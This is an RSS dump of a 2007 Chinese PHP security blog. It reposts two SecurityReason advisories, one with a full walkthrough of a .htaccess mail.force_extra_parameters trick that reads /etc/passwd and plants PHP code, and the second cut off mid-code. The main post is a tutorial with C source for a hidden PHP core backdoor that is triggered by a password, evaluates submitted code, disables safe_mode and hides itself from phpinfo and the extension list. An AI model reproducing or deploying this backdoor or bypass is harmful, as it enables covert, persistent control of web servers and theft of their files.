PHP博客-GaRY's Blog-随笔分类-PHP corehttp://www.phpweblog.net/GaRY/category/83.htmlBeginning is always beautifulzh-cnMon, 26 Nov 2007 05:41:21 GMTMon, 26 Nov 2007 05:41:21 GMT60[zt]PHP 5.2.4 mail.force_extra_parameters unsecurehttp://www.phpweblog.net/GaRY/archive/2007/11/26/2392.htmlwofeiwowofeiwoMon, 26 Nov 2007 04:03:00 GMThttp://www.phpweblog.net/GaRY/archive/2007/11/26/2392.htmlhttp://www.phpweblog.net/GaRY/comments/2392.htmlhttp://www.phpweblog.net/GaRY/archive/2007/11/26/2392.html#Feedback0http://www.phpweblog.net/GaRY/comments/commentRss/2392.htmlhttp://www.phpweblog.net/GaRY/services/trackbacks/2392.htmlps:通过mail.force_extra_parameters,还真像当年的mail函数bypass safemode漏洞.


  Topic : PHP 5.2.4 mail.force_extra_parameters unsecure
  SecurityAlert : 47
  CVE : CVE-2007-3378
  SecurityRisk : Medium  alert
  Remote Exploit : No
  Local Exploit : Yes
  Exploit Given : Yes
  Credit : Maksymilian Arciemowicz
  Date : 25.11.2007
  Affected Software : PHP <= 5.2.4

  Advisory Text :  

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[PHP 5.2.4 mail.force_extra_parameters unsecure ]

Author: Maksymilian Arciemowicz (cXIb8O3)
SecurityReason
Date:
- - Written: 06.09.2007
- - Public: 0x.0x.2007

SecurityReason Research
SecurityAlert Id: 47

CVE: CVE-2007-3378
SecurityRisk: Medium

Affected Software: PHP <= 5.2.4
Advisory URL:
http://securityreason.com/achievement_securityalert/47
Vendor: http://www.php.net

- --- 0.Description ---

PHP is an HTML-embedded scripting language. Much of its syntax is
borrowed from C, Java and Perl with a couple of unique
PHP-specific features thrown in. The goal of the language is to
allow web developers to write dynamically generated pages
quickly.
When using PHP as an Apache module, you can also change the
configuration settings using directives in Apache configuration
files (e.g. httpd.conf) and .htaccess files. You will need
"AllowOverride Options" or "AllowOverride
All" privileges to do so.

php_value name value

Sets the value of the specified directive. Can be used only with
PHP_INI_ALL and PHP_INI_PERDIR type directives. To clear a
previously set value use none as the value.
Note: Don't use php_value to set boolean values. php_flag (see
below) should be used instead.

php_flag name on|off

Used to set a boolean configuration directive. Can be used only
with PHP_INI_ALL and PHP_INI_PERDIR type directives.

mail.force_extra_parameters - Force the addition of the specified
parameters to be passed as extra parameters to the sendmail
binary. These parameters will always replace the value of the 5th
parameter to mail(), even in safe mode

http://pl.php.net/manual/en/configuration.changes.php

- --- 1. htaccess safemode and open_basedir Bypass Vulnerability
per mail.force_extra_parameters ---

We have recrived a lot of question about news
http://securityreason.com/news/0/0x1f . And we will show How to
exploit this issue. When using PHP as an Apache module, you can
also change the configuration settings using directives in
.htaccess file. But it is possible to bypass a safe_mode or
open_basedir per mail.force_extra_parameters. In a lot of servers
is sendmail, can be also exim etc. But we show how to exploit
this for a famous mail server (SENDMAIL).

For example you can set mail.force_extra_parameters via
.htaccess.

cxib# curl -I http://localhost:82
HTTP/1.1 200 OK
Date: Thu, 06 Sep 2007 22:18:35 GMT
Server: Apache/2.2.4 (FreeBSD) mod_ssl/2.2.4 OpenSSL/0.9.7e-p1
DAV/2 PHP/5.2.4
Last-Modified: Sat, 20 Nov 2004 20:16:24 GMT
ETag: "27e4f0-2c-4c23b600"
Accept-Ranges: bytes
Content-Length: 44
Content-Type: text/html

Apache 2.2.4 and PHP 5.2.4. Let's see folder
"/narkotyk" in localhost:82.

cxib# ls -la
total 10
drwxrwxrwx 2 www www 512 Sep 7 00:26 .
drwxr-xr-x 4 www wheel 512 Sep 7 00:22 ..
- -rw-r--r-- 1 www www 106 Sep 7 00:25 .htaccess
- -rw-r--r-- 1 www www 29 Sep 7 00:25 file1.php
- -rw-r--r-- 1 www www 56 Sep 7 00:26 file2.php
cxib# cat file1.php
<? include("/etc/passwd"); ?>

cxib# curl http://localhost:82/narkotyk/file1.php
<br />
<b>Warning</b>: include() [<a
href='function.include'>function.include</a>]: SAFE MODE
Restriction in effect. The script whose uid is 80 is not allowed
to access /etc/passwd owned by uid 0 in
<b>/usr/local/www/apache22/data/narkotyk/file1.php</b>
; on line <b>1</b><br />
<br />
<b>Warning</b>: include(/etc/passwd) [<a
href='function.include'>function.include</a>]: failed to
open stream: Invalid argument in
<b>/usr/local/www/apache22/data/narkotyk/file1.php</b>
; on line <b>1</b><br />
<br />
<b>Warning</b>: include() [<a
href='function.include'>function.include</a>]: Failed
opening '/etc/passwd' for inclusion (include_path='.:') in
<b>/usr/local/www/apache22/data/narkotyk/file1.php</b>
; on line <b>1</b><br />

so safe_mode is open.
Let's see files .htaccess and file2.php

cxib# cat file2.php
<? var_dump(mail("root@localhost",
"hallo", "root")); ?>
cxib# cat .htaccess
php_value mail.force_extra_parameters '-C /etc/passwd -X
/usr/local/www/apache22/data/narkotyk/result.txt'

and let's send request to file2.php

cxib# curl http://localhost:82/narkotyk/file2.php
bool(false)

False!? No

cxib# ls -la /usr/local/www/apache22/data/narkotyk/result.txt
- -rw-r--r-- 1 www www 7130 Sep 7 00:31
/usr/local/www/apache22/data/narkotyk/result.txt
cxib#

result.txt has been created.

cxib# cat /usr/local/www/apache22/data/narkotyk/result.txt
69647 >>> /etc/passwd: line 3: unknown configuration
line "root:*:0:0:Charlie &:/root:/bin/csh"
69647 >>> /etc/passwd: line 4: unknown configuration
line "toor:*:0:0:Bourne-again Superuser:/root:"
..... etc.

We can read file and safe_mode and open_basedir is bypassed.

It is possible create file with php code. But we need have
sendmail.cf to send email.

Example:

cxib# cat .htaccess
php_value mail.force_extra_parameters '-C
/usr/local/www/apache22/data/narkotyk/sendmail.cf -X
/usr/local/www/apache22/data/narkotyk/phpcode.php'
cxib# cat file3.php
<? var_dump(mail("root@xxxxxxxxxxxxxxxxxx",
"h<? phpinfo(); ?>allo", "root"));
?>

We need create /usr/local/www/apache22/data/narkotyk/sendmail.cf
and configure this file. Then

cxib# curl http://localhost:82/narkotyk/file3.php
bool(true)
cxib#
cxib# cat phpcode.php
69755 <<< To: root@xxxxxxxxxxxxxxxxxx
69755 <<< Subject: h<? phpinfo(); ?>allo
69755 <<<
69755 <<< root
69755 <<< [EOF]
69757 === CONNECT securityreason.pl
... etc

and now

cxib# curl http://localhost:82/narkotyk/phpcode.php
69755 <<< To: root@xxxxxxxxxxxxxxxxxx
69755 <<< Subject: h<!DOCTYPE html PUBLIC
"-//W3C//DTD XHTML 1.0 Transitional//EN"
"DTD/xhtml1-transitional.dtd">
<html><head>
<style type="text/css">
body {background-color: #ffffff; color: #000000;}
body, td, th, h1, h2 {font-family: sans-serif;}
... phpinfo().

This was example for php 5.2.4 with sendmail. But we think, it is
possible exploit exim and more send mail programs. In PHP 5.2.4
mail.force_extra_parameters is filtered per
php_escape_shell_cmd(). But we needn't bypass this function.

- --- mail.c ---
if (force_extra_parameters) {
extra_cmd = php_escape_shell_cmd(force_extra_parameters);
} else if (extra_cmd) {
extra_cmd = php_escape_shell_cmd(extra_cmd);
}
- --- mail.c ---

Interesting is:

- --- mail.c ---
if (PG(safe_mode) && (ZEND_NUM_ARGS() == 5)) {
php_error_docref(NULL TSRMLS_CC, E_WARNING, "SAFE MODE
Restriction in effect. The fifth parameter is disabled in SAFE
MODE.");
RETURN_FALSE;
}
- --- mail.c ---

5 th parameter in mail() function is checked.
mail.force_extra_parameters no.

Before public advisory we tested issue and we send advisory to
PHP Team. Main problem is that, we do not recived any answer.
We do not checked patch to CVE-2007-3378 (SREASONRES:20070627),
but we are using CVE-2007-3378 to identification .

http://securityreason.com/achievement_securityalert/47

php_escape_shell_cmd() is not reason for CVE-2007-3378.

- --- 2. Exploit ---
SecurityReason will not public official exploit for this issue.

Anybody can self exploit this.

- --- 3. How to fix ---

- --- note from SREASONRES:20070627 ---
This bug has been founded on February 2007
We contacted with PHP Team again.
With co-operation Stanislav Malyshev from PHP Team the PHP 5.2.5
is now fully patched against
"mail.force_extra_parameters" issue .
- --- note from SREASONRES:20070627 ---

Update to PHP5.2.5

- --- 4. Greets ---

For: sp3x, Infospec, p_e_a, l5x and Stefan Esser

- --- 5. Contact ---

Author: SecurityReason [ Maksymilian Arciemowicz ( cXIb8O3 ) ]
Email: cxib [at] securityreason [dot] com
GPG: http://securityreason.pl/key/Arciemowicz.Maksymilian.gpg
http://securityreason.com
http://securityreason.pl
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.5 (FreeBSD)

iD8DBQFHSZ1w3Ke13X/fTO4RAnKnAJ0drPZhrdtiheaR9b8mLZ0IjyJoIQCfZC3A
jn8i1L2eCHVS1jBuN24ySc0=
=ZCW0
-----END PGP SIGNATURE-----


wofeiwo 2007-11-26 12:03 发表评论
]]>Developing A PHP Core Backdoorhttp://www.phpweblog.net/GaRY/archive/2007/05/23/Developing_A_PHP_Core_Backdoor.htmlwofeiwowofeiwoWed, 23 May 2007 12:01:00 GMThttp://www.phpweblog.net/GaRY/archive/2007/05/23/Developing_A_PHP_Core_Backdoor.htmlhttp://www.phpweblog.net/GaRY/comments/1242.htmlhttp://www.phpweblog.net/GaRY/archive/2007/05/23/Developing_A_PHP_Core_Backdoor.html#Feedback0http://www.phpweblog.net/GaRY/comments/commentRss/1242.htmlhttp://www.phpweblog.net/GaRY/services/trackbacks/1242.htmlAuthor: wofeiwo/GaRY  <wofeiwo_at_gmail_dot_com>


目录

1)前言
2)优缺点
3)设计
4)功能实现
5)参考文档
6)一些说明


1)前言

PHP是一个非常流行的web server端的script语言.目前很多web应用程序都基于php语言实现.由于php是个开源软件并易于扩展,所以我们可以通过编写一个PHP模块(module 或者叫扩展 extension)来实现一个Backdoor.而且php支持使用dl函数动态加载模块的技术,这种类似linux等系统上的LKM机制让我们的Backdoor可以更轻松的加载.本文就简单介绍下修改PHP内核的Backdoor的实现.

2)优缺点

优点:

1. 众所周知,PHP是一个跨平台的脚本语言,所以php Backdoor也可以很方便得跨平台.当然这必须要求你尽量使用C库或者使用php内核中提供的API来编写代码.而尽量少用系统API.不过这总比ring0下的Backdoor什么都要自己实现要好.
2. 由于PHP与客户端的通讯是通过http协议实现的.所以也不用担心端口隐藏,进程隐藏等问题.
3. 加载方便.你可以通过设置php.ini或者使用dl函数来加载你的Backdoor.或者,如果你愿意的话你可以把Backdoor编译到php里去.
4. 配合webshell使用,用Backdoor配置php环境,让webshell突破disable fuction,safe_mode,open_basedir等限制.

缺点:

1. 权限低.Backdoor的权限完全取决于web server程序的权限.必须与其他工具配合使用以得到高权限.
2. 基于php,只是一个ring3下的Backdoor,所以不能太底层,很多功能都受到限制.

3)设计:

我们这里做为一个例子,设计了个简单的php Backdoor,它主要实现了几个功能:

1. 通过过滤用户提交的特定变量来启动Backdoor.
2. 修改php环境变量.为webshell提供宽松的执行环境.
3. 直接执行用户提交的php代码.
4. 隐藏自身.

4)功能实现

前置知识:
要编写php Backdoor,必须先了解php module的编写技术.这个内容超出本文的范围,读者可以看下本文最后列出的参考文档.并且最好先查看以下文件以熟悉php内核的API.

php-src/main/php.h, 位于PHP 主目录。这个文件包含了绝大部分 PHP 宏及 API 定义。
php-src/Zend/zend.h, 位于 Zend 主目录。这个文件包含了绝大部分 Zend 宏及 API 定义。
php-src/Zend/zend_API.h, 也位于 Zend 主目录,包含了Zend API 的定义。

以下的结构体,定义了一个PHP Backdoor模块的基本信息:

zend_module_entry wfw_module_entry = {
 STANDARD_MODULE_HEADER,
 "wfw",     //模块名
 wfw_functions,   //导出函数结构体
 PHP_MINIT(wfw),  //模块初始化
 PHP_MSHUTDOWN(wfw), //模块清理
 PHP_RINIT(wfw),  //运行时初始化
 PHP_RSHUTDOWN(wfw), //运行时清理
 PHP_MINFO(wfw),  //处理phpinfo中的模块信息
 "0.1",     //模块版本
 STANDARD_MODULE_PROPERTIES
};


在php生命周期中,ZendEngine首先要初始化module,每个module中定义的PHP_MINIT_FUNCTION函数作为初始化代码(ModuleInit)都会被执行一次,而PHP_RINIT_FUNCTION函数则是在每次页面被请求的时候(RuntimeInit)都会执行一次.因此对php函数的hook,设置php环境变量,对user input的过滤,都可以根据需要在这两个函数中进行.然后在PHP_MSHUTDOWN_FUNCTION和PHP_RSHUTDOWN_FUNCTION中进行相应的清理.而作为Backdoor,PHP_MINFO_FUNCTION函数对我们则没什么必要,可以把这里设置为NULL.

当然会了php api还不够,再配合各系统上提供的api,并通过宏定义区分以跨平台.一个backdoor是很容易编出来的.在本文中我不会直接说明每个功能的实现,这些在所有ring3后门中都大同小异.我只说明些在PHP core环境下需要注意的部分.
 
过滤变量:
要过滤web server传递过来的变量,这有两种办法,一种是通过修改SAPI的input_filter,或者是treat_data.你可以是hook后再执行php的原始代码,也可以直接替换原始函数:

 

//
//函数原型如下:
//unsigned int input_filter(int arg, char *var, char **val, unsigned int val_len, unsigned int *new_val_len TSRMLS_DC)
//arg可以是PARSE_POST,PARSE_GET,PARSE_COOKIE,PARSE_STRING,PARSE_ENV等值,表示此变量是通过什么方式传递进来的.
//var,val分别是变量名和变量值
//
SAPI_API SAPI_INPUT_FILTER_FUNC(wfw_input_filter)
{
 if(new_val_len) *new_val_len = val_len;
 
 ////////////////////////////////////////////////////////
 //以上是原php中处理的代码,下面则是我添加的.
 ////////////////////////////////////////////////////////
 if(strcmp(var,"pw"== 0 || strcmp(*val,"password"== 0)
  dosomething();
 ////////////////////////////////////////////////////////
 return SUCESS;
}

void wfw_hook_input_filter()
{
 sapi_register_input_filter(wfw_input_filter); //注册为input_filter
}

另外一种是直接从php内建的数组里获取变量:

int find_var()
{
 zval **array, **data;
 
 TSRMLS_FETCH();

 //查找_GET数组
 if(SUCCESS != zend_symtable_find(&EG(symbol_table), "_GET", strlen("_GET")+1, (void **)&array))
 {
  return FAILURE;
 }
 //查找pw变量 
 if(SUCCESS != zend_symtable_find(HASH_OF(*array), "pw", strlen("pw")+1, (void **)&data))
 {
  return FAILURE;
 }
// 比对pw变量值,是密码,则执行我们的代码.
 if(strcmp(Z_STRVAL_PP(data),"password"== 0)
  dosomething();
 return SUCCESS;
}

使用那一种方式就看你的要求了.第一种可以直接获得用户提交的原始数据,如果你要在这里做处理或者filter,可以使用这种方法,一般没有特殊要求,使用第二种方法就可以了.

设置环境:
只要修改每次RINIT时候的ini设置,就可以了,我们使用ZEND API: zend_alter_ini_entry就可以实现这个功能:

 

zend_alter_ini_entry("safe_mode", sizeof("safe_mode"), "0", sizeof("0"- 1, PHP_INI_SYSTEM, PHP_INI_STAGE_ACTIVATE);

执行用户提交的代码:
过滤web server传递过来的变量,并用以下函数执行即可:

int run_user_code(char *str)
{
 int result;
 zval retval_ptr;
 result = zend_eval_string(str, &retval_ptr, string_name TSRMLS_CC);
 convert_to_string(retval_ptr);
 php_printf("%s\r\n", Z_STRVAL(zval));
 return result;
}

Hook函数:
Hook函数有不同方式,根据需要Hook函数类型的不同而不同,比如我想要替换phpinfo这个php语言内建函数,只需要这么做:

//注册新函数结构体
zend_function_entry hooked_functions[] = {
 PHP_NAMED_FE(phpinfo, PHP_FN(hooked_phpinfo), NULL//注册为phpinfo的别名
 {NULL, NULL, NULL/* Must be the last line in wfw_functions[] */
};

void hook_fuctions(void)
{
 TSRMLS_FETCH();
 
 /* 替换函数 */
 zend_hash_del(CG(function_table), "phpinfo", sizeof("phpinfo")); //从completer global里删除phpinfo函数
 //注册新函数
#ifndef ZEND_ENGINE_2
 zend_register_functions(hooked_functions, NULL, MODULE_PERSISTENT TSRMLS_CC); 
#else
 zend_register_functions(NULL, hooked_functions, NULL, MODULE_PERSISTENT TSRMLS_CC);
#endif
}

//新函数
PHP_FUNCTION(hooked_phpinfo)
{
 ..
}
/* {{{ PHP_MINIT_FUNCTION
 */
PHP_MINIT_FUNCTION(wfwcbd)
{
 hook_fuctions();
 
 

 return SUCCESS;
}

但是如果想要替换的是php内核的底层api,恐怕就需要使用到其他ring3 hook技术了.inline hook等.但幸好backdoor加载进php内核后和其他api是在同一进程上下文中的,所以查找函数地址也就比较方便.相信也不难实现,但是本文写作过程中并没有测试,有意的朋友可以自己尝试下.

隐藏:
这里所谓的隐藏并不是隐藏我们的文件,而是让我们的Backdoor module在php中不可见.具体做法是让我们的module注册为zend extension,而在module_registry中删除自身.这样get_loaded_extensions也就找不到我们模块的信息了.zend_extension结构体定义如下:

 

struct _zend_extension {
 char *name;
 char *version;
 char *author;
 char *URL;
 char *copyright;

 startup_func_t startup;   //相当于MINIT
 shutdown_func_t shutdown;    //相当于MSHUTDOWN
 activate_func_t activate;  //相当于RINIT
 deactivate_func_t deactivate; //相当于RSHUTDOWN

 message_handler_func_t message_handler;

 op_array_handler_func_t op_array_handler;

 statement_handler_func_t statement_handler;
 fcall_begin_handler_func_t fcall_begin_handler;
 fcall_end_handler_func_t fcall_end_handler;

 op_array_ctor_func_t op_array_ctor;
 op_array_dtor_func_t op_array_dtor;

 int (*api_no_check)(int api_no);
 void *reserved2;
 void *reserved3;
 void *reserved4;
 void *reserved5;
 void *reserved6;
 void *reserved7;
 void *reserved8;

 DL_HANDLE handle;
 int resource_number;
};

实现代码如下:

 

#include "zend_extensions.h"

static zend_llist_position lp = NULL;
static void wfw_op_array_ctor(zend_op_array *op_array);
static void wfw_op_array_dtor(zend_op_array *op_array);
static int (*old_startup)(zend_extension *extension) = NULL;
static zend_extension *ze = NULL
static int wfw_module_startup(zend_extension *extension);
static void wfw_module_active(void);
static void wfw_module_deactive(void);
static void wfw_shutdown(zend_extension *extension);
static int wfw_startup_wrapper(zend_extension *ext);


static zend_extension wfw_zend_extension_entry = {
 "wfwcbd",
 "0.1",
 "wfw PHP Core BackDoor",
 "http://www.phpweblog.net/GaRY",
 "(C) Copyright 2007",
 
 wfw_module_startup,
 wfw_shutdown,
 wfw_module_active,
 wfw_module_deactive,
 NULL,
 NULL,
 NULL,
 NULL,
 NULL,
 wfw_op_array_ctor,
 wfw_op_array_dtor,
 
 STANDARD_ZEND_EXTENSION_PROPERTIES
};


/* {{{ wfw_functions[]
 *
 * Every user visible function must have an entry in wfw_functions[].
 */
zend_function_entry wfw_functions[] = {
 PHP_FE(your_ext_function,   NULL)
 ..
 ..
 {NULL, NULL, NULL/* Must be the last line in wfw_functions[] */
};
/* }}} */

zend_module_entry phper_module_entry = {
#if ZEND_MODULE_API_NO >= 20010901
 STANDARD_MODULE_HEADER,
#endif
 "phper",
 NULL,
 PHP_MINIT(phper),
 NULL, // PHP_MSHUTDOWN(phper),  //同时我们这里也就不需要以下函数了.全部替换为NULL,用zend extension里的同功能函数代替
 NULL, // PHP_RINIT(phper),  
 NULL, // PHP_RSHUTDOWN(phper), 
 NULL, // PHP_MINFO(phper),
#if ZEND_MODULE_API_NO >= 20010901
 "0.1", /* Replace with version number for your extension */
#endif
 STANDARD_MODULE_PROPERTIES
};

static void wfw_op_array_ctor(zend_op_array *op_array)
{
}

static void wfw_op_array_dtor(zend_op_array *op_array)
{
 if (wfw_zend_extension_entry.resource_number != -1) {
  op_array->reserved[wfw_zend_extension_entry.resource_number] = NULL;
 }
}

static int wfw_startup_wrapper(zend_extension *ext)
{
 int res;
 php_printf("php startup_wrapper\r\n");
 ze->startup = old_startup;
 res = old_startup(ext);
 wfw_module_startup(NULL);
 
 return res;
}

static int wfw_module_startup(zend_extension *extension)
{
 zend_module_entry *module_entry_ptr;
 int resid;
 TSRMLS_FETCH();
 
 php_printf("php_startup\r\n");
#ifndef ZEND_ENGINE_2
 zend_register_functions(wfw_functions, NULL, MODULE_PERSISTENT TSRMLS_CC);
#else
 zend_register_functions(NULL, wfw_functions, NULL, MODULE_PERSISTENT TSRMLS_CC);
#endif
 if (zend_hash_find(&module_registry, "wfwcbd", sizeof("wfwcbd"), (void **)&module_entry_ptr)==SUCCESS) {
  
  if (extension) {
  extension->handle = module_entry_ptr->handle;
  } else {
  zend_extension ext;
  ext = wfw_zend_extension_entry;
  ext.handle = module_entry_ptr->handle;
  zend_llist_add_element(&zend_extensions, &ext);
  extension = zend_llist_get_last(&zend_extensions);
  }
  module_entry_ptr->handle = NULL;
  //
  //删除module_registry中的信息
  //
  if(SUCCESS != zend_hash_del(&module_registry, "wfwcbd", sizeof("wfwcbd"))) return FAILURE;

 } else {
  return FAILURE;
 }

 resid = zend_get_resource_handle(extension);
 wfw_zend_extension_entry.resource_number = resid;

 return SUCCESS;


static void wfw_module_active()
{
 //php_printf("wfw active!\r\n");
 do_something_while_active();
}
static void wfw_module_deactive()
{
 //php_printf("wfw deactive!\r\n");
 do_something_while_deactive();
}
static void wfw_shutdown(zend_extension *extension)
{
 //php_printf("wfw shutdown\r\n");
 do_something_while_shutdown();
}

再配合hook phpinfo等函数,就可以让我们对php环境变量做的修改看不出来:

 

PHP_FUNCTION(hooked_phpinfo)

  int argc = ZEND_NUM_ARGS();
  long flag;
 
 //恢复设置
 zend_alter_ini_entry("safe_mode", sizeof("safe_mode"),
  old_safe_mode, sizeof(old_safe_mode) - 1, PHP_INI_SYSTEM, PHP_INI_STAGE_ACTIVATE);
    zend_alter_ini_entry("open_basedir", sizeof("open_basedir"),
  old_open_basedir, sizeof(old_open_basedir) - 1, PHP_INI_SYSTEM, PHP_INI_STAGE_ACTIVATE);
 
 
 
 if (zend_parse_parameters(argc TSRMLS_CC, "|l", &flag) == FAILURE) {
  return;
 }
 
 if(!argc) {
  flag = PHP_INFO_ALL;
 }
 
 php_start_ob_buffer(NULL, 4096, 0 TSRMLS_CC);
 php_print_info(flag TSRMLS_CC);
 php_end_ob_buffer(1, 0 TSRMLS_CC);
 
 //重新设置环境
 zend_alter_ini_entry("safe_mode", sizeof("safe_mode"),
  "0", sizeof("0"- 1, PHP_INI_SYSTEM, PHP_INI_STAGE_ACTIVATE);
 zend_alter_ini_entry("open_basedir", sizeof("open_basedir"),
  "", sizeof(""- 1, PHP_INI_SYSTEM, PHP_INI_STAGE_ACTIVATE);
 ..
 ..
 
 RETURN_TRUE;
}

使用以上所述的方法,基本一个简单的PHP core backdoor就可以实现了.当然,我们其实还可以加入些其他功能.比如通过控制http头提供个可交互shell,比如内嵌一个php webshell在module中,触发后用php_start_ob_buffer函数及php_end_ob_buffer控制输出,替代任何一个php文件的输出为我们的webshell....
开阔你的大脑吧.一切都由你的想像力来完成:)

5)一些说明

很久没有写文档了,文章比较乱.请各位包涵吧.我的语文水平也就那么点了:)
由于对于php core的研究我也是新手,以上文章难免失误,请各位指正,我的email: wofeiwo_at_gmail_dot_com
最后感谢下Ben.yan在本文写作过程中对我的极大帮助.没有他本文是完不成的

6)参考文档

PHP手册: http://www.php.net/manual/en/
PHP源代码: http://www.php.net/
suhosin源代码: http://www.suhosin.org/
php win32执行程序module: http://www.phpweblog.net/GaRY/archive/2007/05/15/php_win32_create_process_module.html



wofeiwo 2007-05-23 20:01 发表评论
]]>php win32执行程序modulehttp://www.phpweblog.net/GaRY/archive/2007/05/15/php_win32_create_process_module.htmlwofeiwowofeiwoTue, 15 May 2007 02:23:00 GMThttp://www.phpweblog.net/GaRY/archive/2007/05/15/php_win32_create_process_module.htmlhttp://www.phpweblog.net/GaRY/comments/1198.htmlhttp://www.phpweblog.net/GaRY/archive/2007/05/15/php_win32_create_process_module.html#Feedback0http://www.phpweblog.net/GaRY/comments/commentRss/1198.htmlhttp://www.phpweblog.net/GaRY/services/trackbacks/1198.html学写php扩展的练手之作.点下面连接下载:

php_win32_CreateProcess_src

然后你就可以这么使用了:

<?php
if (!dl("php_testmod.dll")) {
  echo "Unable to load php_testmod.dll";
  exit;
}
echo (create_process("ipconfig /all"));
?>

 



wofeiwo 2007-05-15 10:23 发表评论
]]>The Month of PHP Bugshttp://www.phpweblog.net/GaRY/archive/2007/03/08/962.htmlwofeiwowofeiwoThu, 08 Mar 2007 08:50:00 GMThttp://www.phpweblog.net/GaRY/archive/2007/03/08/962.htmlhttp://www.phpweblog.net/GaRY/comments/962.htmlhttp://www.phpweblog.net/GaRY/archive/2007/03/08/962.html#Feedback0http://www.phpweblog.net/GaRY/comments/commentRss/962.htmlhttp://www.phpweblog.net/GaRY/services/trackbacks/962.html
http://www.php-security.org/

wofeiwo 2007-03-08 16:50 发表评论
]]>PHP 5.2.0 session.save_path safe_mode and open_basedir bypasshttp://www.phpweblog.net/GaRY/archive/2006/12/09/PHP_5_0_2_session_save_path.htmlwofeiwowofeiwoSat, 09 Dec 2006 04:10:00 GMThttp://www.phpweblog.net/GaRY/archive/2006/12/09/PHP_5_0_2_session_save_path.htmlhttp://www.phpweblog.net/GaRY/comments/552.htmlhttp://www.phpweblog.net/GaRY/archive/2006/12/09/PHP_5_0_2_session_save_path.html#Feedback0http://www.phpweblog.net/GaRY/comments/commentRss/552.htmlhttp://www.phpweblog.net/GaRY/services/trackbacks/552.html

这个漏洞让我想起来以前发现的一个php的小问题。想想用在这里倒是很适用:

唯一让我感兴趣的是 , 在测试session相关函数的时候 . 发现通过修改cookie里的session_id可以在session目录下写新文件并控制文件名为 " sess_ " + $session_id  这样的形式 . 如果能再控制一个写到session_data的变量 , 或许能有所作用 . ( $session_id  有字符限制 , 只允许大小写字母 , 还有 " - " " , " 字符 . 并且不能超过php所在系统的文件名长度限制)

同样的 , 如果我已经得到了一个webshell , 利用session_save_path以及session_set_save_handler , 我们可以在允许的任意目录里以进程的权限写任意文件 , 并没有文件名和内容上的任何限制 . 也许这个能在disable了file相关function时能有用 . PHP - 5.0 . 4版本前的session_save_path甚至能绕过open_basedir在任意有权限的地方写文件


  Topic : PHP 5.2.0 session.save_path safe_mode and open_basedir bypass
   SecurityAlert Id : 43
   SecurityRisk : High
   Remote Exploit : No
   Local Exploit : Yes
   Exploit Given : No
   Credit : Maksymilian Arciemowicz
   Date : 8.12.2006

  Affected Software :  PHP 5.2.0


  Advisory Text :
    -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[PHP 5.2.0 session.save_path safe_mode and open_basedir bypass]


Author: Maksymilian Arciemowicz (SecurityReason)
Date:
- - Written: 02.10.2006
- - Public: 08.12.2006
SecurityAlert Id: 43
CVE: CVE-2006-6383
SecurityRisk: High
Affected Software: PHP 5.2.0
Advisory URL: http://securityreason.com/achievement_securityalert/43
Vendor: http://www.php.net

- --- 0.Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and
Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to
allow web developers to write dynamically generated pages quickly.

A nice introduction to PHP by Stig Sather Bakken can be found at
http://www.zend.com/zend/art/intro.php on the Zend website. Also, much of the PHP Conference
Material is freely available.

Session support in PHP consists of a way to preserve certain data across subsequent accesses.
This enables you to build more customized applications and increase the appeal of your web
site.

A visitor accessing your web site is assigned a unique id, the so-called session id. This is
either stored in a cookie on the user side or is propagated in the URL.

session.save_path defines the argument which is passed to the save handler. If you choose the
default files handler, this is the path where the files are created. Defaults to /tmp. See
also session_save_path().

There is an optional N argument to this directive that determines the number of directory
levels your session files will be spread around in. For example, setting to '5;/tmp' may end
up creating a session file and location like
/tmp/4/b/1/e/3/sess_4b1e384ad74619bd212e236e52a5a174If . In order to use N you must create
all of these directories before use. A small shell script exists in ext/session to do this,
it's called mod_files.sh. Also note that if N is used and greater than 0 then automatic
garbage collection will not be performed, see a copy of php.ini for further information.
Also, if you use N, be sure to surround session.save_path in "quotes" because the
separator (;) is also used for comments in php.ini.

- --- 1. session.save_path safe mode and open basedir bypass ---
session.save_path can be set in ini_set(), session_save_path() function. In session.save_path
there must be path where you will save yours tmp file. But syntax for session.save_path can
be:

[/PATH]

OR

[N;/PATH]

N - can be a string.

EXAMPLES:
1 .   session_save_path ( " /DIR/WHERE/YOU/HAVE/ACCESS " )

2 .   session_save_path ( " 5;/DIR/WHERE/YOU/HAVE/ACCESS " )

and

3 . session_save_path ( " /DIR/WHERE/YOU/DONT/HAVE/ACCESS\0;/DIR/WHERE/YOU/HAVE/ACCESS " )

- -1477-1493--- Code from PHP520 ext/session/session.c [START]
PHP_FUNCTION( session_save_path )
{
zval  ** p_name;
int ac  =  ZEND_NUM_ARGS();
char  * old;

 if  (ac  <   0   ||  ac  >   1   ||  zend_get_parameters_ex(ac ,   & p_name)  ==  FAILURE)
WRONG_PARAM_COUNT;

old  =  estrdup(PS(save_path));

 if  (ac  ==   1 ) {
convert_to_string_ex(p_name);
zend_alter_ini_entry( " session.save_path " ,   sizeof ( " session.save_path " ) ,
Z_STRVAL_PP(p_name) ,  Z_STRLEN_PP(p_name) ,  PHP_INI_USER ,  PHP_INI_STAGE_RUNTIME);
}

RETVAL_STRING(old ,   0 );
}
- -1477-1493--- Code from PHP520 ext/session/session.c [END]

Values are set to hash_memory (but before that, safe_mode and open_basedir check this
value).
And if you are starting session (for example session_start()), that value from
session.save_path is checked by function PS_OPEN_FUNC(files).

- -242-300--- Code from PHP520 ext/session/mod_files.c [START]
PS_OPEN_FUNC(files)
{
ps_files  * data;
 const  char  * p ,   * last;
 const  char  * argv[ 3 ];
int argc  =   0 ;
size_t dirdepth  =   0 ;
int filemode  =   0600 ;

 if  ( * save_path  ==   ' \0 ' ) {
 /*  if save path is an empty string, determine the temporary dir  */
save_path  =  php_get_temporary_directory();
}

 /*  split up input parameter  */
last  =  save_path;
 =   strchr (save_path ,   ' ; ' );
 while  (p) {
argv[argc ++ =  last;
last  =   ++ p;
 =   strchr (p ,   ' ; ' );
 if  (argc  >   1 break ;
}
argv[argc ++ =  last;

 if  (argc  >   1 ) {
errno  =   0 ;
dirdepth  =  (size_t) strtol(argv[ 0 ] ,   NULL ,   10 );
 if  (errno  ==  ERANGE) {
php_error( E_WARNING ,  
 " The first parameter in session.save_path is invalid " );
 return  FAILURE;
}
}

 if  (argc  >   2 ) {
errno  =   0 ;
filemode  =  strtol(argv[ 1 ] ,   NULL ,   8 );
